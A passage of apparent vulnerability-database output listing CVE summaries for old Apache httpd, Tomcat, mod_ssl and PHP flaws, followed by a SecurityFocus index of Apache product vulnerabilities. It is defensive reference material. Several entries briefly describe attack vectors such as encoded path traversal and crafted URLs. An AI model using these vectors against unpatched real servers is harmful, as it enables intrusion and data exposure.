13810| [CVE-2003-0253] The prefork MPM in Apache 2 before 2.0.47 does not properly handle certain errors from accept, which could lead to a denial of service.
13811| [CVE-2003-0249] ** DISPUTED ** PHP treats unknown methods such as "PoSt" as a GET request, which could allow attackers to intended access restrictions if PHP is running on a server that passes on all methods, such as Apache httpd 2.0, as demonstrated using a Limit directive. NOTE: this issue has been disputed by the Apache security team, saying "It is by design that PHP allows scripts to process any request method. A script which does not explicitly verify the request method will hence be processed as normal for arbitrary methods. It is therefore expected behaviour that one cannot implement per-method access control using the Apache configuration alone, which is the assumption made in this report."
13812| [CVE-2003-0245] Vulnerability in the apr_psprintf function in the Apache Portable Runtime (APR) library for Apache 2.0.37 through 2.0.45 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via long strings, as demonstrated using XML objects to mod_dav, and possibly other vectors.
13813| [CVE-2003-0192] Apache 2 before 2.0.47, and certain versions of mod_ssl for Apache 1.3, do not properly handle "certain sequences of per-directory renegotiations and the SSLCipherSuite directive being used to upgrade from a weak ciphersuite to a strong one," which could cause Apache to use the weak ciphersuite.
13814| [CVE-2003-0189] The authentication module for Apache 2.0.40 through 2.0.45 on Unix does not properly handle threads safely when using the crypt_r or crypt functions, which allows remote attackers to cause a denial of service (failed Basic authentication with valid usernames and passwords) when a threaded MPM is used.
13815| [CVE-2003-0134] Unknown vulnerability in filestat.c for Apache running on OS2, versions 2.0 through 2.0.45, allows unknown attackers to cause a denial of service via requests related to device names.
13816| [CVE-2003-0132] A memory leak in Apache 2.0 through 2.0.44 allows remote attackers to cause a denial of service (memory consumption) via large chunks of linefeed characters, which causes Apache to allocate 80 bytes for each linefeed.
13817| [CVE-2003-0083] Apache 1.3 before 1.3.25 and Apache 2.0 before version 2.0.46 does not filter terminal escape sequences from its access logs, which could make it easier for attackers to insert those sequences into terminal emulators containing vulnerabilities related to escape sequences, a different vulnerability than CVE-2003-0020.
13818| [CVE-2003-0020] Apache does not filter terminal escape sequences from its error logs, which could make it easier for attackers to insert those sequences into terminal emulators containing vulnerabilities related to escape sequences.
13819| [CVE-2003-0017] Apache 2.0 before 2.0.44 on Windows platforms allows remote attackers to obtain certain files via an HTTP request that ends in certain illegal characters such as ">", which causes a different filename to be processed and served.
13820| [CVE-2003-0016] Apache before 2.0.44, when running on unpatched Windows 9x and Me operating systems, allows remote attackers to cause a denial of service or execute arbitrary code via an HTTP request containing MS-DOS device names.
13821| [CVE-2002-2310] ClickCartPro 4.0 stores the admin_user.db data file under the web document root with insufficient access control on servers other than Apache, which allows remote attackers to obtain usernames and passwords.
13822| [CVE-2002-2309] php.exe in PHP 3.0 through 4.2.2, when running on Apache, does not terminate properly, which allows remote attackers to cause a denial of service via a direct request without arguments.
13823| [CVE-2002-2272] Tomcat 4.0 through 4.1.12, using mod_jk 1.2.1 module on Apache 1.3 through 1.3.27, allows remote attackers to cause a denial of service (desynchronized communications) via an HTTP GET request with a Transfer-Encoding chunked field with invalid values.
13824| [CVE-2002-2103] Apache before 1.3.24, when writing to the log file, records a spoofed hostname from the reverse lookup of an IP address, even when a double-reverse lookup fails, which allows remote attackers to hide the original source of activities.
13825| [CVE-2002-2029] PHP, when installed on Windows with Apache and ScriptAlias for /php/ set to c:/php/, allows remote attackers to read arbitrary files and possibly execute arbitrary programs via an HTTP request for php.exe with a filename in the query string.
13826| [CVE-2002-2012] Unknown vulnerability in Apache 1.3.19 running on HP Secure OS for Linux 1.0 allows remote attackers to cause "unexpected results" via an HTTP request.
13827| [CVE-2002-2009] Apache Tomcat 4.0.1 allows remote attackers to obtain the web root path via HTTP requests for JSP files preceded by (1) +/, (2) >/, (3) </, and (4) %20/, which leaks the pathname in an error message.
13828| [CVE-2002-2008] Apache Tomcat 4.0.3 for Windows allows remote attackers to obtain the web root path via an HTTP request for a resource that does not exist, such as lpt9, which leaks the information in an error message.
13829| [CVE-2002-2007] The default installations of Apache Tomcat 3.2.3 and 3.2.4 allows remote attackers to obtain sensitive system information such as directory listings and web root path, via erroneous HTTP requests for Java Server Pages (JSP) in the (1) test/jsp, (2) samples/jsp and (3) examples/jsp directories, or the (4) test/realPath.jsp servlet, which leaks pathnames in error messages.
13830| [CVE-2002-2006] The default installation of Apache Tomcat 4.0 through 4.1 and 3.0 through 3.3.1 allows remote attackers to obtain the installation path and other sensitive system information via the (1) SnoopServlet or (2) TroubleShooter example servlets.
13831| [CVE-2002-1895] The servlet engine in Jakarta Apache Tomcat 3.3 and 4.0.4, when using IIS and the ajp1.3 connector, allows remote attackers to cause a denial of service (crash) via a large number of HTTP GET requests for an MS-DOS device such as AUX, LPT1, CON, or PRN.
13832| [CVE-2002-1850] mod_cgi in Apache 2.0.39 and 2.0.40 allows local users and possibly remote attackers to cause a denial of service (hang and memory consumption) by causing a CGI script to send a large amount of data to stderr, which results in a read/write deadlock between httpd and the CGI script.
13833| [CVE-2002-1793] HTTP Server mod_ssl module running on HP-UX 11.04 with Virtualvault OS (VVOS) 4.5 through 4.6 closes the connection when the Apache server times out during an SSL request, which may allow attackers to cause a denial of service.
13834| [CVE-2002-1658] Buffer overflow in htdigest in Apache 1.3.26 and 1.3.27 may allow attackers to execute arbitrary code via a long user argument. NOTE: since htdigest is normally only locally accessible and not setuid or setgid, there are few attack vectors which would lead to an escalation of privileges, unless htdigest is executed from a CGI program. Therefore this may not be a vulnerability.
13835| [CVE-2002-1635] The Apache configuration file (httpd.conf) in Oracle 9i Application Server (9iAS) uses a Location alias for /perl directory instead of a ScriptAlias, which allows remote attackers to read the source code of arbitrary CGI files via a URL containing the /perl directory instead of /cgi-bin.
13836| [CVE-2002-1593] mod_dav in Apache before 2.0.42 does not properly handle versioning hooks, which may allow remote attackers to kill a child process via a null dereference and cause a denial of service (CPU consumption) in a preforked multi-processing module.
13837| [CVE-2002-1592] The ap_log_rerror function in Apache 2.0 through 2.035, when a CGI application encounters an error, sends error messages to the client that include the full path for the server, which allows remote attackers to obtain sensitive information.
13838| [CVE-2002-1567] Cross-site scripting (XSS) vulnerability in Apache Tomcat 4.1 allows remote attackers to execute arbitrary web script and steal cookies via a URL with encoded newlines followed by a request to a .jsp file whose name contains the script.
13839| [CVE-2002-1394] Apache Tomcat 4.0.5 and earlier, when using both the invoker servlet and the default servlet, allows remote attackers to read source code for server files or bypass certain protections, a variant of CAN-2002-1148.
13840| [CVE-2002-1233] A regression error in the Debian distributions of the apache-ssl package (before 1.3.9 on Debian 2.2, and before 1.3.26 on Debian 3.0), for Apache 1.3.27 and earlier, allows local users to read or modify the Apache password file via a symlink attack on temporary files when the administrator runs (1) htpasswd or (2) htdigest, a re-introduction of a vulnerability that was originally identified and addressed by CVE-2001-0131.
13841| [CVE-2002-1157] Cross-site scripting vulnerability in the mod_ssl Apache module 2.8.9 and earlier, when UseCanonicalName is off and wildcard DNS is enabled, allows remote attackers to execute script as other web site visitors, via the server name in an HTTPS response on the SSL port, which is used in a self-referencing URL, a different vulnerability than CAN-2002-0840.
13842| [CVE-2002-1156] Apache 2.0.42 allows remote attackers to view the source code of a CGI script via a POST request to a directory with both WebDAV and CGI enabled.
13843| [CVE-2002-1148] The default servlet (org.apache.catalina.servlets.DefaultServlet) in Tomcat 4.0.4 and 4.1.10 and earlier allows remote attackers to read source code for server files via a direct request to the servlet.
13844| [CVE-2002-0935] Apache Tomcat 4.0.3, and possibly other versions before 4.1.3 beta, allows remote attackers to cause a denial of service (resource exhaustion) via a large number of requests to the server with null characters, which causes the working threads to hang.
13845| [CVE-2002-0843] Buffer overflows in the ApacheBench benchmark support program (ab.c) in Apache before 1.3.27, and Apache 2.x before 2.0.43, allow a malicious web server to cause a denial of service and possibly execute arbitrary code via a long response.
13846| [CVE-2002-0840] Cross-site scripting (XSS) vulnerability in the default error page of Apache 2.0 before 2.0.43, and 1.3.x up to 1.3.26, when UseCanonicalName is "Off" and support for wildcard DNS is present, allows remote attackers to execute script as other web page visitors via the Host: header, a different vulnerability than CAN-2002-1157.
13847| [CVE-2002-0839] The shared memory scoreboard in the HTTP daemon for Apache 1.3.x before 1.3.27 allows any user running as the Apache UID to send a SIGUSR1 signal to any process as root, resulting in a denial of service (process kill) or possibly other behaviors that would not normally be allowed, by modifying the parent[].pid and parent[].last_rtime segments in the scoreboard.
13848| [CVE-2002-0682] Cross-site scripting vulnerability in Apache Tomcat 4.0.3 allows remote attackers to execute script as other web users via script in a URL with the /servlet/ mapping, which does not filter the script when an exception is thrown by the servlet.
13849| [CVE-2002-0661] Directory traversal vulnerability in Apache 2.0 through 2.0.39 on Windows, OS2, and Netware allows remote attackers to read arbitrary files and execute commands via .. (dot dot) sequences containing \ (backslash) characters.
13850| [CVE-2002-0658] OSSP mm library (libmm) before 1.2.0 allows the local Apache user to gain privileges via temporary files, possibly via a symbolic link attack.
13851| [CVE-2002-0654] Apache 2.0 through 2.0.39 on Windows, OS2, and Netware allows remote attackers to determine the full pathname of the server via (1) a request for a .var file, which leaks the pathname in the resulting error message, or (2) via an error message that occurs when a script (child process) cannot be invoked.
13852| [CVE-2002-0653] Off-by-one buffer overflow in the ssl_compat_directive function, as called by the rewrite_command hook for mod_ssl Apache module 2.8.9 and earlier, allows local users to execute arbitrary code as the Apache server user via .htaccess files with long entries.
13853| [CVE-2002-0513] The PHP administration script in popper_mod 1.2.1 and earlier relies on Apache .htaccess authentication, which allows remote attackers to gain privileges if the script is not appropriately configured by the administrator.
13854| [CVE-2002-0493] Apache Tomcat may be started without proper security settings if errors are encountered while reading the web.xml file, which could allow attackers to bypass intended restrictions.
13855| [CVE-2002-0392] Apache 1.3 through 1.3.24, and Apache 2.0 through 2.0.36, allows remote attackers to cause a denial of service and possibly execute arbitrary code via a chunk-encoded HTTP request that causes Apache to use an incorrect size.
13856| [CVE-2002-0259] InstantServers MiniPortal 1.1.5 and earlier stores sensitive login and account data in plaintext in (1) .pwd files in the miniportal/apache directory, or (2) mplog.txt, which could allow local users to gain privileges.
13857| [CVE-2002-0249] PHP for Windows, when installed on Apache 2.0.28 beta as a standalone CGI module, allows remote attackers to obtain the physical path of the php.exe via a request with malformed arguments such as /123, which leaks the pathname in the error message.
13858| [CVE-2002-0240] PHP, when installed with Apache and configured to search for index.php as a default web page, allows remote attackers to obtain the full pathname of the server via the HTTP OPTIONS method, which reveals the pathname in the resulting error message.
13859| [CVE-2002-0082] The dbm and shm session cache code in mod_ssl before 2.8.7-1.3.23, and Apache-SSL before 1.3.22+1.46, does not properly initialize memory using the i2d_SSL_SESSION function, which allows remote attackers to use a buffer overflow to execute arbitrary code via a large client certificate that is signed by a trusted Certificate Authority (CA), which produces a large serialized session.
13860| [CVE-2002-0061] Apache for Win32 before 1.3.24, and 2.0.x before 2.0.34-beta, allows remote attackers to execute arbitrary commands via shell metacharacters (a | pipe character) provided as arguments to batch (.bat) or .cmd scripts, which are sent unfiltered to the shell interpreter, typically cmd.exe.
13861| [CVE-2001-1556] The log files in Apache web server contain information directly supplied by clients and does not filter or quote control characters, which could allow remote attackers to hide HTTP requests and spoof source IP addresses when logs are viewed with UNIX programs such as cat, tail, and grep.
13862| [CVE-2001-1534] mod_usertrack in Apache 1.3.11 through 1.3.20 generates session ID's using predictable information including host IP address, system time and server process ID, which allows local users to obtain session ID's and bypass authentication when these session ID's are used for authentication.
13863| [CVE-2001-1510] Allaire JRun 2.3.3, 3.0 and 3.1 running on IIS 4.0 and 5.0, iPlanet, Apache, JRun web server (JWS), and possibly other web servers allows remote attackers to read arbitrary files and directories by appending (1) "%3f.jsp", (2) "?.jsp" or (3) "?" to the requested URL.
13864| [CVE-2001-1449] The default installation of Apache before 1.3.19 on Mandrake Linux 7.1 through 8.0 and Linux Corporate Server 1.0.1 allows remote attackers to list the directory index of arbitrary web directories.
13865| [CVE-2001-1385] The Apache module for PHP 4.0.0 through PHP 4.0.4, when disabled with the 'engine = off' option for a virtual host, may disable PHP for other virtual hosts, which could cause Apache to serve the source code of PHP scripts.
13866| [CVE-2001-1342] Apache before 1.3.20 on Windows and OS/2 systems allows remote attackers to cause a denial of service (GPF) via an HTTP request for a URI that contains a large number of / (slash) or other characters, which causes certain functions to dereference a null pointer.
13867| [CVE-2001-1217] Directory traversal vulnerability in PL/SQL Apache module in Oracle Oracle 9i Application Server allows remote attackers to access sensitive information via a double encoded URL with .. (dot dot) sequences.
13868| [CVE-2001-1216] Buffer overflow in PL/SQL Apache module in Oracle 9i Application Server allows remote attackers to execute arbitrary code via a long request for a help page.
13869| [CVE-2001-1072] Apache with mod_rewrite enabled on most UNIX systems allows remote attackers to bypass RewriteRules by inserting extra / (slash) characters into the requested path, which causes the regular expression in the RewriteRule to fail.
13870| [CVE-2001-1013] Apache on Red Hat Linux with with the UserDir directive enabled generates different error codes when a username exists and there is no public_html directory and when the username does not exist, which could allow remote attackers to determine valid usernames on the server.
13871| [CVE-2001-0925] The default installation of Apache before 1.3.19 allows remote attackers to list directories instead of the multiview index.html file via an HTTP request for a path that contains many / (slash) characters, which causes the path to be mishandled by (1) mod_negotiation, (2) mod_dir, or (3) mod_autoindex.
13872| [CVE-2001-0829] A cross-site scripting vulnerability in Apache Tomcat 3.2.1 allows a malicious webmaster to embed Javascript in a request for a .JSP file, which causes the Javascript to be inserted into an error message.
13873| [CVE-2001-0766] Apache on MacOS X Client 10.0.3 with the HFS+ file system allows remote attackers to bypass access restrictions via a URL that contains some characters whose case is not matched by Apache's filters.
13874| [CVE-2001-0731] Apache 1.3.20 with Multiviews enabled allows remote attackers to view directory contents and bypass the index page via a URL containing the "M=D" query string.
13875| [CVE-2001-0730] split-logfile in Apache 1.3.20 allows remote attackers to overwrite arbitrary files that end in the .log extension via an HTTP request with a / (slash) in the Host: header.
13876| [CVE-2001-0729] Apache 1.3.20 on Windows servers allows remote attackers to bypass the default index page and list directory contents via a URL with a large number of / (slash) characters.
13877| [CVE-2001-0590] Apache Software Foundation Tomcat Servlet prior to 3.2.2 allows a remote attacker to read the source code to arbitrary 'jsp' files via a malformed URL request which does not end with an HTTP protocol specification (i.e. HTTP/1.0).
13878| [CVE-2001-0131] htpasswd and htdigest in Apache 2.0a9, 1.3.14, and others allows local users to overwrite arbitrary files via a symlink attack.
13879| [CVE-2001-0108] PHP Apache module 4.0.4 and earlier allows remote attackers to bypass .htaccess access restrictions via a malformed HTTP request on an unrestricted page that causes PHP to use those access controls on the next page that is requested.
13880| [CVE-2001-0042] PHP 3.x (PHP3) on Apache 1.3.6 allows remote attackers to read arbitrary files via a modified .. (dot dot) attack containing "%5c" (encoded backslash) sequences.
13881| [CVE-2000-1247] The default configuration of the jserv-status handler in jserv.conf in Apache JServ 1.1.2 includes an "allow from 127.0.0.1" line, which allows local users to discover JDBC passwords or other sensitive information via a direct request to the jserv/ URI.
13882| [CVE-2000-1210] Directory traversal vulnerability in source.jsp of Apache Tomcat before 3.1 allows remote attackers to read arbitrary files via a .. (dot dot) in the argument to source.jsp.
13883| [CVE-2000-1206] Vulnerability in Apache httpd before 1.3.11, when configured for mass virtual hosting using mod_rewrite, or mod_vhost_alias in Apache 1.3.9, allows remote attackers to retrieve arbitrary files.
13884| [CVE-2000-1205] Cross site scripting vulnerabilities in Apache 1.3.0 through 1.3.11 allow remote attackers to execute script as other web site visitors via (1) the printenv CGI (printenv.pl), which does not encode its output, (2) pages generated by the ap_send_error_response function such as a default 404, which does not add an explicit charset, or (3) various messages that are generated by certain Apache modules or core code. NOTE: the printenv issue might still exist for web browsers that can render text/plain content types as HTML, such as Internet Explorer, but CVE regards this as a design limitation of those browsers, not Apache. The printenv.pl/acuparam vector, discloser on 20070724, is one such variant.
13885| [CVE-2000-1204] Vulnerability in the mod_vhost_alias virtual hosting module for Apache 1.3.9, 1.3.11 and 1.3.12 allows remote attackers to obtain the source code for CGI programs if the cgi-bin directory is under the document root.
13886| [CVE-2000-1168] IBM HTTP Server 1.3.6 (based on Apache) allows remote attackers to cause a denial of service and possibly execute arbitrary commands via a long GET request.
13887| [CVE-2000-1016] The default configuration of Apache (httpd.conf) on SuSE 6.4 includes an alias for the /usr/doc directory, which allows remote attackers to read package documentation and obtain system configuration information via an HTTP request for the /doc/packages URL.
13888| [CVE-2000-0913] mod_rewrite in Apache 1.3.12 and earlier allows remote attackers to read arbitrary files if a RewriteRule directive is expanded to include a filename whose name contains a regular expression.
13889| [CVE-2000-0883] The default configuration of mod_perl for Apache as installed on Mandrake Linux 6.1 through 7.1 sets the /perl/ directory to be browseable, which allows remote attackers to list the contents of that directory.
13890| [CVE-2000-0869] The default configuration of Apache 1.3.12 in SuSE Linux 6.4 enables WebDAV, which allows remote attackers to list arbitrary diretories via the PROPFIND HTTP request method.
13891| [CVE-2000-0868] The default configuration of Apache 1.3.12 in SuSE Linux 6.4 allows remote attackers to read source code for CGI scripts by replacing the /cgi-bin/ in the requested URL with /cgi-bin-sdb/.
13892| [CVE-2000-0791] Trustix installs the httpsd program for Apache-SSL with world-writeable permissions, which allows local users to replace it with a Trojan horse.
13893| [CVE-2000-0760] The Snoop servlet in Jakarta Tomcat 3.1 and 3.0 under Apache reveals sensitive system information when a remote attacker requests a nonexistent URL with a .snp extension.
13894| [CVE-2000-0759] Jakarta Tomcat 3.1 under Apache reveals physical path information when a remote attacker requests a URL that does not exist, which generates an error message that includes the physical path.
13895| [CVE-2000-0628] The source.asp example script in the Apache ASP module Apache::ASP 1.93 and earlier allows remote attackers to modify files.
13896| [CVE-2000-0505] The Apache 1.3.x HTTP server for Windows platforms allows remote attackers to list directory contents by requesting a URL containing a large number of / characters.
13897| [CVE-1999-1412] A possible interaction between Apple MacOS X release 1.0 and Apache HTTP server allows remote attackers to cause a denial of service (crash) via a flood of HTTP GET requests to CGI programs, which generates a large number of processes.
13898| [CVE-1999-1293] mod_proxy in Apache 1.2.5 and earlier allows remote attackers to cause a denial of service via malformed FTP commands, which causes Apache to dump core.
13899| [CVE-1999-1237] Multiple buffer overflows in smbvalid/smbval SMB authentication library, as used in Apache::AuthenSmb and possibly other modules, allows remote attackers to execute arbitrary commands via (1) a long username, (2) a long password, and (3) other unspecified methods.
13900| [CVE-1999-1199] Apache WWW server 1.3.1 and earlier allows remote attackers to cause a denial of service (resource exhaustion) via a large number of MIME headers with the same name, aka the "sioux" vulnerability.
13901| [CVE-1999-1053] guestbook.pl cleanses user-inserted SSI commands by removing text between "<!--" and "-->" separators, which allows remote attackers to execute arbitrary commands when guestbook.pl is run on Apache 1.3.9 and possibly other versions, since Apache allows other closing sequences besides "-->".
13902| [CVE-1999-0926] Apache allows remote attackers to conduct a denial of service via a large number of MIME headers.
13903| [CVE-1999-0678] A default configuration of Apache on Debian GNU/Linux sets the ServerRoot to /usr/doc, which allows remote users to read documentation files for the entire server.
13904| [CVE-1999-0448] IIS 4.0 and Apache log HTTP request methods, regardless of how long they are, allowing a remote attacker to hide the URL they really request.
13905| [CVE-1999-0289] The Apache web server for Win32 may provide access to restricted files when a . (dot) is appended to a requested URL.
13906| [CVE-1999-0236] ScriptAlias directory in NCSA and Apache httpd allowed attackers to read CGI programs.
13907| [CVE-1999-0107] Buffer overflow in Apache 1.2.5 and earlier allows a remote attacker to cause a denial of service with a large number of GET requests containing a large number of / characters.
13908| [CVE-1999-0071] Apache httpd cookie buffer overflow for versions 1.1.1 and earlier.
13909|
13910| SecurityFocus - https://www.securityfocus.com/bid/:
13911| [104554] Apache HBase CVE-2018-8025 Security Bypass Vulnerability
13912| [104465] Apache Geode CVE-2017-15695 Remote Code Execution Vulnerability
13913| [104418] Apache Storm CVE-2018-8008 Arbitrary File Write Vulnerability
13914| [104399] Apache Storm CVE-2018-1332 User Impersonation Vulnerability
13915| [104348] Apache UIMA CVE-2017-15691 XML External Entity Injection Vulnerability
13916| [104313] Apache NiFi XML External Entity Injection and Denial of Service Vulnerability
13917| [104259] Apache Geode CVE-2017-12622 Authorization Bypass Vulnerability
13918| [104257] Apache Sling XSS Protection API CVE-2017-15717 Cross Site Scripting Vulnerability
13919| [104253] Apache ZooKeeper CVE-2018-8012 Security Bypass Vulnerability
13920| [104252] Apache Batik CVE-2018-8013 Information Disclosure Vulnerability
13921| [104239] Apache Solr CVE-2018-8010 XML External Entity Multiple Information Disclosure Vulnerabilities
13922| [104215] Apache ORC CVE-2018-8015 Denial of Service Vulnerability
13923| [104203] Apache Tomcat CVE-2018-8014 Security Bypass Vulnerability
13924| [104161] Apache Ambari CVE-2018-8003 Directory Traversal Vulnerability
13925| [104140] Apache Derby CVE-2018-1313 Security Bypass Vulnerability
13926| [104135] Apache Tika CVE-2018-1338 Denial of Service Vulnerability
13927| [104008] Apache Fineract CVE-2018-1291 SQL Injection Vulnerability
13928| [104007] Apache Fineract CVE-2018-1292 SQL Injection Vulnerability
13929| [104005] Apache Fineract CVE-2018-1289 SQL Injection Vulnerability
13930| [104001] Apache Tika CVE-2018-1335 Remote Command Injection Vulnerability
13931| [103975] Apache Fineract CVE-2018-1290 SQL Injection Vulnerability
13932| [103974] Apache Solr CVE-2018-1308 XML External Entity Injection Vulnerability
13933| [103772] Apache Traffic Server CVE-2017-7671 Denial of Service Vulnerability
13934| [103770] Apache Traffic Server CVE-2017-5660 Security Bypass Vulnerability
13935| [103751] Apache Hive CVE-2018-1282 SQL Injection Vulnerability
13936| [103750] Apache Hive CVE-2018-1284 Security Bypass Vulnerability
13937| [103692] Apache Ignite CVE-2018-1295 Arbitrary Code Execution Vulnerability
13938| [103528] Apache HTTP Server CVE-2018-1302 Denial of Service Vulnerability
13939| [103525] Apache HTTP Server CVE-2017-15715 Remote Security Bypass Vulnerability
13940| [103524] Apache HTTP Server CVE-2018-1312 Remote Security Bypass Vulnerability
13941| [103522] Apache HTTP Server CVE-2018-1303 Denial of Service Vulnerability
13942| [103520] Apache HTTP Server CVE-2018-1283 Remote Security Vulnerability
13943| [103516] Apache Struts CVE-2018-1327 Denial of Service Vulnerability
13944| [103515] Apache HTTP Server CVE-2018-1301 Denial of Service Vulnerability
13945| [103512] Apache HTTP Server CVE-2017-15710 Denial of Service Vulnerability
13946| [103508] Apache Syncope CVE-2018-1321 Multiple Remote Code Execution Vulnerabilities
13947| [103507] Apache Syncope CVE-2018-1322 Multiple Information Disclosure Vulnerabilities
13948| [103490] Apache Commons Compress CVE-2018-1324 Multiple Denial Of Service Vulnerabilities
13949| [103434] APACHE Allura CVE-2018-1319 HTTP Response Splitting Vulnerability
13950| [103389] Apache Tomcat JK Connector CVE-2018-1323 Directory Traversal Vulnerability
13951| [103222] Apache CloudStack CVE-2013-4317 Information Disclosure Vulnerability
13952| [103219] Apache Xerces-C CVE-2017-12627 Null Pointer Dereference Denial of Service Vulnerability
13953| [103206] Apache Geode CVE-2017-15693 Remote Code Execution Vulnerability
13954| [103205] Apache Geode CVE-2017-15692 Remote Code Execution Vulnerability
13955| [103170] Apache Tomcat CVE-2018-1304 Security Bypass Vulnerability
13956| [103144] Apache Tomcat CVE-2018-1305 Security Bypass Vulnerability
13957| [103102] Apache Oozie CVE-2017-15712 Information Disclosure Vulnerability
13958| [103098] Apache Karaf CVE-2016-8750 LDAP Injection Vulnerability
13959| [103069] Apache Tomcat CVE-2017-15706 Remote Security Weakness
13960| [103068] Apache JMeter CVE-2018-1287 Security Bypass Vulnerability
13961| [103067] Apache Qpid Dispatch Router 'router_core/connections.c' Denial of Service Vulnerability
13962| [103036] Apache CouchDB CVE-2017-12636 Remote Code Execution Vulnerability
13963| [103025] Apache Thrift CVE-2016-5397 Remote Command Injection Vulnerability
13964| [102879] Apache POI CVE-2017-12626 Multiple Denial of Service Vulnerabilities
13965| [102842] Apache NiFi CVE-2017-12632 Host Header Injection Vulnerability
13966| [102815] Apache NiFi CVE-2017-15697 Multiple Cross Site Scripting Vulnerabilities
13967| [102488] Apache Geode CVE-2017-9795 Remote Code Execution Vulnerability
13968| [102229] Apache Sling CVE-2017-15700 Information Disclosure Vulnerability
13969| [102226] Apache Drill CVE-2017-12630 Cross Site Scripting Vulnerability
13970| [102154] Multiple Apache Products CVE-2017-15708 Remote Code Execution Vulnerability
13971| [102127] Apache CXF Fediz CVE-2017-12631 Multiple Cross Site Request Forgery Vulnerabilities
13972| [102041] Apache Qpid Broker-J CVE-2017-15701 Denial of Service Vulnerability
13973| [102040] Apache Qpid Broker CVE-2017-15702 Security Weakness
13974| [102021] Apache Struts CVE-2017-15707 Denial of Service Vulnerability
13975| [101980] EMC RSA Authentication Agent for Web: Apache Web Server Authentication Bypass Vulnerability
13976| [101876] Apache Camel CVE-2017-12634 Deserialization Remote Code Execution Vulnerability
13977| [101874] Apache Camel CVE-2017-12633 Deserialization Remote Code Execution Vulnerability
13978| [101872] Apache Karaf CVE-2014-0219 Local Denial of Service Vulnerability
13979| [101868] Apache CouchDB CVE-2017-12635 Remote Privilege Escalation Vulnerability
13980| [101859] Apache CXF CVE-2017-12624 Denial of Service Vulnerability
13981| [101844] Apache Sling Servlets Post CVE-2017-11296 Cross Site Scripting Vulnerability
13982| [101686] Apache Hive CVE-2017-12625 Information Disclosure Vulnerability
13983| [101644] Apache Wicket CVE-2012-5636 Cross Site Scripting Vulnerability
13984| [101631] Apache Traffic Server CVE-2015-3249 Multiple Remote Code Execution Vulnerabilities
13985| [101630] Apache Traffic Server CVE-2014-3624 Access Bypass Vulnerability
13986| [101625] Apache jUDDI CVE-2009-1197 Security Bypass Vulnerability
13987| [101623] Apache jUDDI CVE-2009-1198 Cross Site Scripting Vulnerability
13988| [101620] Apache Subversion 'libsvn_fs_fs/fs_fs.c' Denial of Service Vulnerability
13989| [101585] Apache OpenOffice Multiple Remote Code Execution Vulnerabilities
13990| [101577] Apache Wicket CVE-2016-6806 Cross Site Request Forgery Vulnerability
13991| [101575] Apache Wicket CVE-2014-0043 Information Disclosure Vulnerability
13992| [101570] Apache Geode CVE-2017-9797 Information Disclosure Vulnerability
13993| [101562] Apache Derby CVE-2010-2232 Arbitrary File Overwrite Vulnerability
13994| [101560] Apache Portable Runtime Utility CVE-2017-12613 Multiple Information Disclosure Vulnerabilities
13995| [101558] Apache Portable Runtime Utility Local Out-of-Bounds Read Denial of Service Vulnerability
13996| [101532] Apache James CVE-2017-12628 Arbitrary Command Execution Vulnerability
13997| [101516] Apache HTTP Server CVE-2017-12171 Security Bypass Vulnerability
13998| [101261] Apache Solr/Lucene CVE-2017-12629 Information Disclosure and Remote Code Execution Vulnerabilities
13999| [101230] Apache Roller CVE-2014-0030 XML External Entity Injection Vulnerability
14000| [101173] Apache IMPALA CVE-2017-9792 Information Disclosure Vulnerability
14001| [101052] Apache Commons Jelly CVE-2017-12621 Security Bypass Vulnerability
14002| [101027] Apache Mesos CVE-2017-7687 Denial of Service Vulnerability
14003| [101023] Apache Mesos CVE-2017-9790 Denial of Service Vulnerability
14004| [100954] Apache Tomcat CVE-2017-12617 Incomplete Fix Remote Code Execution Vulnerability
14005| [100946] Apache Wicket CVE-2014-7808 Cross Site Request Forgery Vulnerability
14006| [100901] Apache Tomcat CVE-2017-12615 Remote Code Execution Vulnerability
14007| [100897] Apache Tomcat CVE-2017-12616 Information Disclosure Vulnerability
14008| [100880] Apache Directory LDAP API CVE-2015-3250 Unspecified Information Disclosure Vulnerability
14009| [100872] Apache HTTP Server CVE-2017-9798 Information Disclosure Vulnerability
14010| [100870] Apache Solr CVE-2017-9803 Remote Privilege Escalation Vulnerability
14011| [100859] puppetlabs-apache CVE-2017-2299 Information Disclosure Vulnerability
14012| [100829] Apache Struts CVE-2017-12611 Remote Code Execution Vulnerability
14013| [100823] Apache Spark CVE-2017-12612 Deserialization Remote Code Execution Vulnerability
14014| [100612] Apache Struts CVE-2017-9804 Incomplete Fix Denial of Service Vulnerability
14015| [100611] Apache Struts CVE-2017-9793 Denial of Service Vulnerability
14016| [100609] Apache Struts CVE-2017-9805 Remote Code Execution Vulnerability
14017| [100587] Apache Atlas CVE-2017-3155 Cross Frame Scripting Vulnerability
14018| [100581] Apache Atlas CVE-2017-3154 Information Disclosure Vulnerability
14019| [100578] Apache Atlas CVE-2017-3153 Cross Site Scripting Vulnerability
14020| [100577] Apache Atlas CVE-2017-3152 Cross Site Scripting Vulnerability
14021| [100547] Apache Atlas CVE-2017-3151 HTML Injection Vulnerability
14022| [100536] Apache Atlas CVE-2017-3150 Cross Site Scripting Vulnerability
14023| [100449] Apache Pony Mail CVE-2016-4460 Authentication Bypass Vulnerability
14024| [100447] Apache2Triad Multiple Security Vulnerabilities
14025| [100284] Apache Sling Servlets Post CVE-2017-9802 Cross Site Scripting Vulnerability
14026| [100280] Apache Tomcat CVE-2017-7674 Security Bypass Vulnerability
14027| [100259] Apache Subversion CVE-2017-9800 Remote Command Execution Vulnerability
14028| [100256] Apache Tomcat CVE-2017-7675 Directory Traversal Vulnerability
14029| [100235] Apache Storm CVE-2017-9799 Remote Code Execution Vulnerability
14030| [100082] Apache Commons Email CVE-2017-9801 SMTP Header Injection Vulnerability
14031| [99873] Apache Sling XSS Protection API CVE-2016-6798 XML External Entity Injection Vulnerability
14032| [99870] Apache Sling API CVE-2016-5394 Cross Site Scripting Vulnerability
14033| [99603] Apache Spark CVE-2017-7678 Cross Site Scripting Vulnerability
14034| [99592] Apache OpenMeetings CVE-2017-7685 Security Bypass Vulnerability
14035| [99587] Apache OpenMeetings CVE-2017-7673 Security Bypass Vulnerability
14036| [99586] Apache OpenMeetings CVE-2017-7688 Security Bypass Vulnerability
14037| [99584] Apache OpenMeetings CVE-2017-7684 Denial of Service Vulnerability
14038| [99577] Apache OpenMeetings CVE-2017-7663 Cross Site Scripting Vulnerability
14039| [99576] Apache OpenMeetings CVE-2017-7664 XML External Entity Injection Vulnerability
14040| [99569] Apache HTTP Server CVE-2017-9788 Memory Corruption Vulnerability
14041| [99568] Apache HTTP Server CVE-2017-9789 Denial of Service Vulnerability
